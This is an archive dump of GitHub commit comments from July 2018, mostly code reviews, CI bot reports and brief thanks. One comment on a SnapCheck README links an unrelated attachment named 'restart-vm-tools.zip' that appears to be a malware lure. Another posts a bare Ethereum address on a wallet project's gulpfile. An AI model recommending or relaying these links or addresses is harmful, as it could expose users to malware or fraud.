{"id":"7930887223","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29626095,"position":250,"line":250,"path":"prov/mrail/src/mrail_rma.c","commit_id":"69e76689081e2d11f7a02d190a32e2c476679237","created_at":"2018-07-06T20:50:02Z","updated_at":"2018-07-06T20:50:02Z","author_association":"NONE","body":"Can we get a better name than 'l', which also looks like a 1?"}},"created_at":"2018-07-06T20:50:02Z"}
{"id":"7930889682","type":"CommitCommentEvent","actor":{"login":"alexcrichton"},"repo":{"name":"alexcrichton/xz2-rs"},"payload":{"comment":{"id":29626103,"position":null,"line":null,"path":null,"commit_id":"696882cf490a4885976ab880aa717ae574c64de2","created_at":"2018-07-06T20:50:41Z","updated_at":"2018-07-06T20:50:41Z","author_association":"OWNER","body":"Sure thing, done!"}},"created_at":"2018-07-06T20:50:41Z"}
{"id":"7930890236","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29626105,"position":null,"line":null,"path":null,"commit_id":"7bb8954df36fcf84681abaed3885f824fd448ed6","created_at":"2018-07-06T20:50:51Z","updated_at":"2018-07-06T20:50:51Z","author_association":"COLLABORATOR","body":"Not sure how the version numbers for the cabal files work. Pretty much bumped up version numbers until repeating errors in different files were removed...\r\n@JacquesCarette @samm82 Is there any way to know when to bump the version number up? Is it bad to move up to a high version number  in a short span of time?"}},"created_at":"2018-07-06T20:50:51Z"}
{"id":"7930895143","type":"CommitCommentEvent","actor":{"login":"Eijebong"},"repo":{"name":"alexcrichton/xz2-rs"},"payload":{"comment":{"id":29626113,"position":null,"line":null,"path":null,"commit_id":"696882cf490a4885976ab880aa717ae574c64de2","created_at":"2018-07-06T20:52:14Z","updated_at":"2018-07-06T20:52:14Z","author_association":"NONE","body":"Thanks a lot :heart: "}},"created_at":"2018-07-06T20:52:14Z"}
{"id":"7930895804","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29626124,"position":259,"line":259,"path":"prov/mrail/src/mrail_rma.c","commit_id":"69e76689081e2d11f7a02d190a32e2c476679237","created_at":"2018-07-06T20:52:24Z","updated_at":"2018-07-06T20:52:24Z","author_association":"NONE","body":"This should be a generic slist splice operation added to ofi_list.h"}},"created_at":"2018-07-06T20:52:24Z"}
{"id":"7930897438","type":"CommitCommentEvent","actor":{"login":"mikefaille"},"repo":{"name":"MTI830PyTraders/TradingPlayground"},"payload":{"comment":{"id":29626127,"position":null,"line":null,"path":null,"commit_id":"675c816e46b25ced1411092569a989e14f8272d3","created_at":"2018-07-06T20:52:51Z","updated_at":"2018-07-06T20:52:51Z","author_association":"CONTRIBUTOR","body":"😎 je pourrais m'impliquer en fds. Mais good job champion"}},"created_at":"2018-07-06T20:52:51Z"}
{"id":"7930898974","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29626132,"position":318,"line":318,"path":"prov/mrail/src/mrail_rma.c","commit_id":"69e76689081e2d11f7a02d190a32e2c476679237","created_at":"2018-07-06T20:53:16Z","updated_at":"2018-07-06T20:53:16Z","author_association":"NONE","body":"The above loop should be in a separate subroutine"}},"created_at":"2018-07-06T20:53:16Z"}
{"id":"7930900616","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29626135,"position":null,"line":null,"path":null,"commit_id":"7bb8954df36fcf84681abaed3885f824fd448ed6","created_at":"2018-07-06T20:53:41Z","updated_at":"2018-07-06T20:53:41Z","author_association":"OWNER","body":"You should bump up the version number only by +0.0.1 in most circumstances.\r\n\r\nYou should bump it up whenever you make a change to interfaces, such as any change to `Language.Drasil.hs`, or a change to the signature of any function that is exported there.\r\n\r\nYou then also need to bump up the dependencies of the other packages, so that they will pick up the new version."}},"created_at":"2018-07-06T20:53:41Z"}
{"id":"7930905546","type":"CommitCommentEvent","actor":{"login":"stepak88"},"repo":{"name":"OfficeDev/Office-Add-in-Dialog-API-Simple-Example"},"payload":{"comment":{"id":29626152,"position":7,"line":7,"path":"Office-Add-in-Dialog-API-Simple-Example.yml","commit_id":"2304d66438323239eb81e61b734bd8b231cc4615","created_at":"2018-07-06T20:55:03Z","updated_at":"2018-07-06T20:55:03Z","author_association":"NONE","body":"[](url)"}},"created_at":"2018-07-06T20:55:03Z"}
{"id":"7930906720","type":"CommitCommentEvent","actor":{"login":"carmenjeannette"},"repo":{"name":"siulpolb/PruebaHadoop"},"payload":{"comment":{"id":29626156,"position":null,"line":null,"path":null,"commit_id":"d0532766474570fab776b453d1a8913a470db034","created_at":"2018-07-06T20:55:23Z","updated_at":"2018-07-06T20:55:23Z","author_association":"COLLABORATOR","body":"hill"}},"created_at":"2018-07-06T20:55:23Z"}
{"id":"7930907545","type":"CommitCommentEvent","actor":{"login":"carmenjeannette"},"repo":{"name":"siulpolb/PruebaHadoop"},"payload":{"comment":{"id":29626165,"position":null,"line":null,"path":null,"commit_id":"d0532766474570fab776b453d1a8913a470db034","created_at":"2018-07-06T20:55:37Z","updated_at":"2018-07-06T20:55:37Z","author_association":"COLLABORATOR","body":"lolo"}},"created_at":"2018-07-06T20:55:37Z"}
{"id":"7930910509","type":"CommitCommentEvent","actor":{"login":"zunaalabaya"},"repo":{"name":"lockchainco/etherwallet"},"payload":{"comment":{"id":29626177,"position":20,"line":313,"path":"gulpfile.js","commit_id":"a62327f59ad05ea3eaa54d5ad3c8a7765c1afd29","created_at":"2018-07-06T20:56:24Z","updated_at":"2018-07-06T20:56:24Z","author_association":"NONE","body":">/to<0xDbDCFc69d5eA8366975E3c82CEE4fDE0411f76cB></>"}},"created_at":"2018-07-06T20:56:24Z"}
{"id":"7930912129","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29626182,"position":null,"line":null,"path":null,"commit_id":"c1ad3f78654c9f34fb043e0cc96cd632dd4d889e","created_at":"2018-07-06T20:56:48Z","updated_at":"2018-07-06T20:56:48Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/78/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/78//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/c1ad3f78654c9f34fb043e0cc96cd632dd4d889e/78/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/c1ad3f78654c9f34fb043e0cc96cd632dd4d889e/78/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/c1ad3f78654c9f34fb043e0cc96cd632dd4d889e/78/jenkins-results/generator-diff/index.html) (please review changes)\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/xcode10/c1ad3f78654c9f34fb043e0cc96cd632dd4d889e/78/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n1 tests failed, 160 tests passed.\n\n## Failed tests\n\n * introspection/iOS Unified 32-bits - simulator/Debug: Failed\n"}},"created_at":"2018-07-06T20:56:48Z"}
{"id":"7930914619","type":"CommitCommentEvent","actor":{"login":"fabianfrz"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29626187,"position":null,"line":null,"path":null,"commit_id":"00f9b21cb78d9f76a8f94e8e62cbcefad65b7d99","created_at":"2018-07-06T20:57:27Z","updated_at":"2018-07-06T20:57:27Z","author_association":"MEMBER","body":"@fichtner try to avoid printf for not formatted output since it is slow. The rest looks good."}},"created_at":"2018-07-06T20:57:27Z"}
{"id":"7930916858","type":"CommitCommentEvent","actor":{"login":"advaith1"},"repo":{"name":"DynoCC/Dyno-Custom-Commands"},"payload":{"comment":{"id":29626189,"position":4,"line":10,"path":"_config.yml","commit_id":"5d2d04996b7ce6a2085dd815e792d1b16a3d0e0a","created_at":"2018-07-06T20:58:02Z","updated_at":"2018-07-06T20:58:02Z","author_association":"MEMBER","body":"its impossible to set up analytics with the code being private, anyone can just view source"}},"created_at":"2018-07-06T20:58:02Z"}
{"id":"7930917967","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29626191,"position":null,"line":null,"path":null,"commit_id":"00f9b21cb78d9f76a8f94e8e62cbcefad65b7d99","created_at":"2018-07-06T20:58:20Z","updated_at":"2018-07-06T20:58:20Z","author_association":"MEMBER","body":"sure, can do echo instead.. it was always this way in the file but will fix."}},"created_at":"2018-07-06T20:58:20Z"}
{"id":"7930919902","type":"CommitCommentEvent","actor":{"login":"dakhnod"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29626192,"position":141,"line":328,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-06T20:58:52Z","updated_at":"2018-07-06T20:58:52Z","author_association":"OWNER","body":"wird es in :336"}},"created_at":"2018-07-06T20:58:52Z"}
{"id":"7930919977","type":"CommitCommentEvent","actor":{"login":"Serkan-devel"},"repo":{"name":"quidsup/notrack"},"payload":{"comment":{"id":29626193,"position":null,"line":null,"path":null,"commit_id":"2733d072bdd1959d5aa228a7aa885970d3ad895a","created_at":"2018-07-06T20:58:53Z","updated_at":"2018-07-06T20:58:53Z","author_association":"NONE","body":"Yay ^^"}},"created_at":"2018-07-06T20:58:53Z"}
{"id":"7930923399","type":"CommitCommentEvent","actor":{"login":"armpogart"},"repo":{"name":"armpogart/yii2"},"payload":{"comment":{"id":29626200,"position":65,"line":334,"path":"framework/db/BaseActiveRecord.php","commit_id":"a7a2f1471fc40d55967f0709194ba2dc93a8b8b3","created_at":"2018-07-06T20:59:48Z","updated_at":"2018-07-06T20:59:48Z","author_association":"OWNER","body":"@Inkognitoo Sorry, this is old commit with mistake, it is fixed in later commits."}},"created_at":"2018-07-06T20:59:48Z"}
{"id":"7930923736","type":"CommitCommentEvent","actor":{"login":"yinghai"},"repo":{"name":"intel/ideep"},"payload":{"comment":{"id":29626201,"position":43,"line":2339,"path":"include/ideep/computations.hpp","commit_id":"55a293c4f71efebbef389cf00e1637fc36ffa621","created_at":"2018-07-06T20:59:53Z","updated_at":"2018-07-06T20:59:53Z","author_association":"NONE","body":"`K*S` and `C*S` can be cached. "}},"created_at":"2018-07-06T20:59:53Z"}
{"id":"7930926940","type":"CommitCommentEvent","actor":{"login":"geek1011"},"repo":{"name":"just-install/registry"},"payload":{"comment":{"id":29626215,"position":null,"line":null,"path":null,"commit_id":"41ba77d94321df8cdca4200be3976173a5f1d77e","created_at":"2018-07-06T21:00:37Z","updated_at":"2018-07-06T21:00:37Z","author_association":"MEMBER","body":"Yay! I fixed the tests. See just-install/registry@ad097686b80623f63cf0c904460aa3824752410c."}},"created_at":"2018-07-06T21:00:37Z"}
{"id":"7930927029","type":"CommitCommentEvent","actor":{"login":"dakhnod"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29626216,"position":177,"line":364,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-06T21:00:39Z","updated_at":"2018-07-06T21:00:39Z","author_association":"OWNER","body":"ne, die loop ended, sobald die condition nicht mehr erfüllt ist.\r\nAuch wenn man da per label hinjumpt, überprüft er nur die for-condition und fährt dann fort zw. bricht ab."}},"created_at":"2018-07-06T21:00:39Z"}
{"id":"7930931529","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/gonavis-franchising"},"payload":{"comment":{"id":29626222,"position":null,"line":null,"path":null,"commit_id":"c99ba2de861aea7e7bc1e0eeb38377bd631db559","created_at":"2018-07-06T21:01:50Z","updated_at":"2018-07-06T21:01:50Z","author_association":"COLLABORATOR","body":"Created multidev environment [gonavis-franchising#ci-116](https://dashboard.pantheon.io/sites/bd2040d9-444e-4c2e-ad13-fd575701973a#ci-116).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-116-gonavis-franchising.pantheonsite.io/)"}},"created_at":"2018-07-06T21:01:50Z"}
{"id":"7930932690","type":"CommitCommentEvent","actor":{"login":"ramadv1"},"repo":{"name":"ramadv1/Learning-by-Playing-it-Forward-Book"},"payload":{"comment":{"id":29626226,"position":null,"line":null,"path":null,"commit_id":"7786dd0afeb83dd90975e0f0e5e716e90030b41a","created_at":"2018-07-06T21:02:09Z","updated_at":"2018-07-06T21:02:09Z","author_association":"OWNER","body":"Growing Systems of Success 07-06-2018\r\nhttps://www.facebook.com/groups/235075123710450/permalink/270924010125561/"}},"created_at":"2018-07-06T21:02:09Z"}
{"id":"7930933598","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29626230,"position":null,"line":null,"path":null,"commit_id":"94293fa8dbf4b93bf8c52d0198727ac159f062e2","created_at":"2018-07-06T21:02:23Z","updated_at":"2018-07-06T21:02:23Z","author_association":"MEMBER","body":"@fabianfrz FYI"}},"created_at":"2018-07-06T21:02:23Z"}
{"id":"7930934284","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29626233,"position":null,"line":null,"path":null,"commit_id":"7835b70c6bedad6e2851670637008f2ea86f10a6","created_at":"2018-07-06T21:02:35Z","updated_at":"2018-07-06T21:02:35Z","author_association":"MEMBER","body":"@fabianfrz FYI"}},"created_at":"2018-07-06T21:02:35Z"}
{"id":"7930935314","type":"CommitCommentEvent","actor":{"login":"pwelson"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29626237,"position":null,"line":null,"path":null,"commit_id":"c4098ace79330648c2d47bcb976d4f27218d0898","created_at":"2018-07-06T21:02:52Z","updated_at":"2018-07-06T21:02:52Z","author_association":"NONE","body":"thanks very good and easy "}},"created_at":"2018-07-06T21:02:52Z"}
{"id":"7930937247","type":"CommitCommentEvent","actor":{"login":"yburette"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29626243,"position":78,"line":299,"path":"prov/mrail/src/mrail.h","commit_id":"69e76689081e2d11f7a02d190a32e2c476679237","created_at":"2018-07-06T21:03:24Z","updated_at":"2018-07-06T21:03:24Z","author_association":"OWNER","body":"I needed to save all the remote addresses so that a failed/deferred subreq could be re-posted on a different rail. And since these were common to all subreqs, I thought it was the right location. Am I missing something?"}},"created_at":"2018-07-06T21:03:24Z"}
{"id":"7930941104","type":"CommitCommentEvent","actor":{"login":"yinghai"},"repo":{"name":"intel/ideep"},"payload":{"comment":{"id":29626249,"position":62,"line":2358,"path":"include/ideep/computations.hpp","commit_id":"55a293c4f71efebbef389cf00e1637fc36ffa621","created_at":"2018-07-06T21:04:28Z","updated_at":"2018-07-06T21:04:28Z","author_association":"NONE","body":"So this requires an reorder too? Which kind of defeat the purpose of implementing it in ideep land? When will be the output of conv op be in public format? "}},"created_at":"2018-07-06T21:04:28Z"}
{"id":"7930947859","type":"CommitCommentEvent","actor":{"login":"yburette"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29626255,"position":72,"line":72,"path":"prov/mrail/src/mrail_rma.c","commit_id":"69e76689081e2d11f7a02d190a32e2c476679237","created_at":"2018-07-06T21:06:17Z","updated_at":"2018-07-06T21:06:17Z","author_association":"OWNER","body":"Yes, this will be replaced by Arun's new generic function."}},"created_at":"2018-07-06T21:06:17Z"}
{"id":"7930957347","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29626274,"position":78,"line":299,"path":"prov/mrail/src/mrail.h","commit_id":"69e76689081e2d11f7a02d190a32e2c476679237","created_at":"2018-07-06T21:08:55Z","updated_at":"2018-07-06T21:08:55Z","author_association":"NONE","body":"Isn't the remote_addr specific to the rail being used? If you move a subreq to a different rail, doesn't the remote_addr change?  Maybe there needs to be some way to show which address a given subreq is using."}},"created_at":"2018-07-06T21:08:55Z"}
{"id":"7930962804","type":"CommitCommentEvent","actor":{"login":"ghost-cyber"},"repo":{"name":"nozerodaytoday/SnapCheck"},"payload":{"comment":{"id":29626287,"position":2,"line":2,"path":"README.md","commit_id":"82c31ca194a7b649f8e7a4cbe0b4ebaa2b91e17d","created_at":"2018-07-06T21:10:24Z","updated_at":"2018-07-06T21:10:24Z","author_association":"NONE","body":"# SnapCheck\r\nChecker Usernames Snapchat Using SC APIhttps://github.com/nozerodaytoday/SnapCheck.git\r\n[restart-vm-tools.zip](https://github.com/nozerodaytoday/SnapCheck/files/2171986/restart-vm-tools.zip)\r\n"}},"created_at":"2018-07-06T21:10:24Z"}
{"id":"7930964822","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/gonavis-franchising"},"payload":{"comment":{"id":29626292,"position":null,"line":null,"path":null,"commit_id":"71e2d64fea1fd495d6ebfc77d341b0b85ea67aee","created_at":"2018-07-06T21:10:58Z","updated_at":"2018-07-06T21:10:58Z","author_association":"COLLABORATOR","body":"Created multidev environment [gonavis-franchising#ci-117](https://dashboard.pantheon.io/sites/bd2040d9-444e-4c2e-ad13-fd575701973a#ci-117).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-117-gonavis-franchising.pantheonsite.io/)"}},"created_at":"2018-07-06T21:10:58Z"}
{"id":"7930966043","type":"CommitCommentEvent","actor":{"login":"letorbi"},"repo":{"name":"letorbi/tarp.require"},"payload":{"comment":{"id":29626294,"position":5,"line":56,"path":"require.js","commit_id":"724fd6617abbbbf6ac2b859cfb2aaf5afb5062e1","created_at":"2018-07-06T21:11:18Z","updated_at":"2018-07-06T21:11:18Z","author_association":"OWNER","body":"`href` is stored in advance. The line here exists just to handle redirects and AFAIK `responseURL` is the only way to detect that redirect has happened, if `XMLHttpRequest` is used. `fetch()` has better ways to handle redirect, but it cannot be used here, because the request might have to be synchronous.\r\n\r\nI'm aware the `resposneURL` is not available in IE11 and have an idea for an approach that would also work there, but this will be postponed after the release of version 1.0, since it would break the compatibility with previous versions of Tarp.require."}},"created_at":"2018-07-06T21:11:18Z"}
{"id":"7930968363","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29626301,"position":null,"line":null,"path":null,"commit_id":"6c7531ea10c5afa5ef04487def2c5772a1a5d480","created_at":"2018-07-06T21:11:58Z","updated_at":"2018-07-06T21:11:58Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2973 of 2973 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6c7531ea10c5afa5ef04487def2c5772a1a5d480-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6c7531ea10c5afa5ef04487def2c5772a1a5d480-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T21:11:58Z"}
{"id":"7930971211","type":"CommitCommentEvent","actor":{"login":"ronawho"},"repo":{"name":"chapel-lang/chapel"},"payload":{"comment":{"id":29626309,"position":8,"line":791,"path":"util/start_test","commit_id":"71b07766eba924122717eb2f6335e7a33cf8fa40","created_at":"2018-07-06T21:12:44Z","updated_at":"2018-07-06T21:12:44Z","author_association":"CONTRIBUTOR","body":"https://github.com/chapel-lang/chapel/pull/10188 should resolve this. It makes a number of improvements, but most notably we will not do any checks for `CHPL_REGEXP=none`"}},"created_at":"2018-07-06T21:12:44Z"}
{"id":"7930972498","type":"CommitCommentEvent","actor":{"login":"Nexon99"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29626315,"position":null,"line":null,"path":null,"commit_id":"84cb45b87a5c2a7100dba770deaa212d6f8a54f0","created_at":"2018-07-06T21:13:03Z","updated_at":"2018-07-06T21:13:03Z","author_association":"NONE","body":"❤️ "}},"created_at":"2018-07-06T21:13:03Z"}
{"id":"7930976527","type":"CommitCommentEvent","actor":{"login":"Inkognitoo"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":29626321,"position":5,"line":294,"path":"framework/db/BaseActiveRecord.php","commit_id":"242e61505dceadfb1d298f6659b82f0c496956d4","created_at":"2018-07-06T21:14:11Z","updated_at":"2018-07-06T21:14:11Z","author_association":"NONE","body":"Интересная фича )\r\nНо мне казалось, геттеры не принимают аргументов и из бд свойство нужно получать через getAttribute()"}},"created_at":"2018-07-06T21:14:11Z"}
{"id":"7930982029","type":"CommitCommentEvent","actor":{"login":"cnflexi"},"repo":{"name":"cnflexi/nasimzadah.github.io"},"payload":{"comment":{"id":29626330,"position":null,"line":null,"path":null,"commit_id":"d6231939c1394af7fecc0351304a61b5ea01548b","created_at":"2018-07-06T21:15:42Z","updated_at":"2018-07-06T21:15:42Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-06T21:15:42Z"}
{"id":"7930982937","type":"CommitCommentEvent","actor":{"login":"ddgenome"},"repo":{"name":"atomist/sdm"},"payload":{"comment":{"id":29626331,"position":null,"line":null,"path":null,"commit_id":"92a8a66213a389461fe9b284691075137d7a09a1","created_at":"2018-07-06T21:15:55Z","updated_at":"2018-07-06T21:15:55Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-06T21:15:55Z"}
{"id":"7930985653","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29626339,"position":null,"line":null,"path":null,"commit_id":"6c7531ea10c5afa5ef04487def2c5772a1a5d480","created_at":"2018-07-06T21:16:39Z","updated_at":"2018-07-06T21:16:39Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6c7531ea10c5afa5ef04487def2c5772a1a5d480-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-06T21:16:39Z"}
{"id":"7930990452","type":"CommitCommentEvent","actor":{"login":"857487"},"repo":{"name":"globaltoken/node-open-mining-portal"},"payload":{"comment":{"id":29626341,"position":null,"line":null,"path":null,"commit_id":"8730c9946d62745096b3f1feb87c7ddfb2300c7c","created_at":"2018-07-06T21:18:05Z","updated_at":"2018-07-06T21:18:05Z","author_association":"NONE","body":"blake2b coin\r\nUnknown stratum method from"}},"created_at":"2018-07-06T21:18:05Z"}
{"id":"7930992051","type":"CommitCommentEvent","actor":{"login":"lwchadderdon"},"repo":{"name":"ahob85/CodeNext-CSSI-2018-Solutions"},"payload":{"comment":{"id":29626344,"position":2,"line":1,"path":"hello.js","commit_id":"2c785b889deb6a450904e3dc52eb9738a4a79c75","created_at":"2018-07-06T21:18:33Z","updated_at":"2018-07-06T21:18:33Z","author_association":"NONE","body":"Students won't see readline until lesson 3 now right?"}},"created_at":"2018-07-06T21:18:33Z"}
{"id":"7930992949","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"wszuwar/Task"},"payload":{"comment":{"id":29626345,"position":25,"line":25,"path":"src/main/java/com/crud/tasks/service/SimplyEmailService.java","commit_id":"3713008b05f002c730a693b193c7ebf431aae627","created_at":"2018-07-06T21:18:50Z","updated_at":"2018-07-06T21:18:50Z","author_association":"NONE","body":"Zobacz, że tworzysz obiekt z CC a potem tworzysz znowu obiekt bez CC (niezależnie czy istnieje czy nie).\r\nSpróbuj to bardziej \"rozbić\" - tworzenie obiektu powinno być tylko raz"}},"created_at":"2018-07-06T21:18:50Z"}
{"id":"7930994650","type":"CommitCommentEvent","actor":{"login":"yburette"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29626350,"position":34,"line":191,"path":"prov/mrail/src/mrail_cq.c","commit_id":"69e76689081e2d11f7a02d190a32e2c476679237","created_at":"2018-07-06T21:19:17Z","updated_at":"2018-07-06T21:19:17Z","author_association":"OWNER","body":"Yep, I see. Another possibility would be to use separate locks. Which one do you prefer?"}},"created_at":"2018-07-06T21:19:17Z"}
{"id":"7930998410","type":"CommitCommentEvent","actor":{"login":"evevkovacs"},"repo":{"name":"aphearin/cosmodc2"},"payload":{"comment":{"id":29626357,"position":null,"line":null,"path":null,"commit_id":"7ac3ecc32ffddf110a547aacc4d304f651b09653","created_at":"2018-07-06T21:20:20Z","updated_at":"2018-07-06T21:20:20Z","author_association":"COLLABORATOR","body":"Implemented changes as above and found one typo in the call signature for create_synthetic_lowmass_mock...needs to have umachine included in function definition:\r\ndef create_synthetic_lowmass_mock(mock, mpeak_synthetic, mstar_synthetic, Lbox):\r\n\r\nWith this change, code is running and am getting the following error:\r\n...generating and stacking synthetic cluster satellites\r\nTraceback (most recent call last):\r\n  File \"run_cosmoDC2_healpix_production.py\", line 131, in <module>\r\n    redshift_list, commit_hash, synthetic_halo_minimum_mass=synthetic_halo_minimum_mass)\r\n  File \"/home/ekovacs/cosmology/cosmodc2/cosmodc2/write_umachine_healpix_mock_to_disk.py\", line 221, in write_umachine_healpix_mock_to_disk\r\n    mpeak_synthetic, mstar_synthetic, redshift_method='halo')\r\n  File \"/home/ekovacs/cosmology/cosmodc2/cosmodc2/write_umachine_healpix_mock_to_disk.py\", line 409, in build_output_snapshot_mock\r\n    dc2['redshift_halo_only'] = np.repeat(target_halos['halo_redshift'], target_halos['richness'])\r\n  File \"/home/ekovacs/.local/lib/python2.7/site-packages/astropy/table/table.py\", line 1307, in __setitem__\r\n    self.add_columns([new_column], copy=False)\r\n  File \"/home/ekovacs/.local/lib/python2.7/site-packages/astropy/table/table.py\", line 1706, in add_columns\r\n    self._init_from_cols(newcols)\r\n  File \"/home/ekovacs/.local/lib/python2.7/site-packages/astropy/table/table.py\", line 749, in _init_from_cols\r\n    .format(lengths))\r\nValueError: Inconsistent data column lengths: set([704187, 4807949])\r\nThis error is happening because the old method:\r\n  dc2['redshift_halo_only'] = np.repeat(target_halos['halo_redshift'], target_halos['richness'])\r\nno longer works because of the extra satellites and halos.\r\nWill try to figure this out..."}},"created_at":"2018-07-06T21:20:20Z"}
{"id":"7930999115","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":29626358,"position":null,"line":null,"path":null,"commit_id":"f561d941956c56be4fb3aa6ccd15a2e7706a439f","created_at":"2018-07-06T21:20:32Z","updated_at":"2018-07-06T21:20:32Z","author_association":"CONTRIBUTOR","body":"common\n"}},"created_at":"2018-07-06T21:20:32Z"}
{"id":"7930999211","type":"CommitCommentEvent","actor":{"login":"letorbi"},"repo":{"name":"letorbi/tarp.require"},"payload":{"comment":{"id":29626359,"position":18,"line":86,"path":"require.js","commit_id":"3a6ccc682ed384490bee7ba74cc1b3487ff3044a","created_at":"2018-07-06T21:20:34Z","updated_at":"2018-07-06T21:20:34Z","author_association":"OWNER","body":"`XMLHttpRequest.timeout` might not be supported by some old/rare browsers, but all major browser support it for quite a long time. Apart from that `request.timeout` is set explicitly in [line 106](https://github.com/letorbi/tarp.require/blob/3a6ccc682ed384490bee7ba74cc1b3487ff3044a/require.js#L106), so it would contain an appropriate value even on browsers that do not support the actual `XMLHttpRequest.timeout` functionality."}},"created_at":"2018-07-06T21:20:34Z"}
{"id":"7931004363","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"letorbi/tarp.require"},"payload":{"comment":{"id":29626370,"position":18,"line":86,"path":"require.js","commit_id":"3a6ccc682ed384490bee7ba74cc1b3487ff3044a","created_at":"2018-07-06T21:22:01Z","updated_at":"2018-07-06T21:22:01Z","author_association":"NONE","body":"Chrome 28 was old or rare? Nah that doesn't compute."}},"created_at":"2018-07-06T21:22:01Z"}
{"id":"7931007133","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29626373,"position":null,"line":null,"path":null,"commit_id":"8f42fafd9287e8041559ca4d127903afd18a6149","created_at":"2018-07-06T21:22:42Z","updated_at":"2018-07-06T21:22:42Z","author_association":"CONTRIBUTOR","body":"Line 1317 has a typo `!#if !env_mobile` should be `!#if env_mobile`"}},"created_at":"2018-07-06T21:22:42Z"}
{"id":"7931013054","type":"CommitCommentEvent","actor":{"login":"letorbi"},"repo":{"name":"letorbi/tarp.require"},"payload":{"comment":{"id":29626389,"position":18,"line":86,"path":"require.js","commit_id":"3a6ccc682ed384490bee7ba74cc1b3487ff3044a","created_at":"2018-07-06T21:24:23Z","updated_at":"2018-07-06T21:24:23Z","author_association":"OWNER","body":"The earliest release date of Chrome 20 was 2013-06-17."}},"created_at":"2018-07-06T21:24:23Z"}
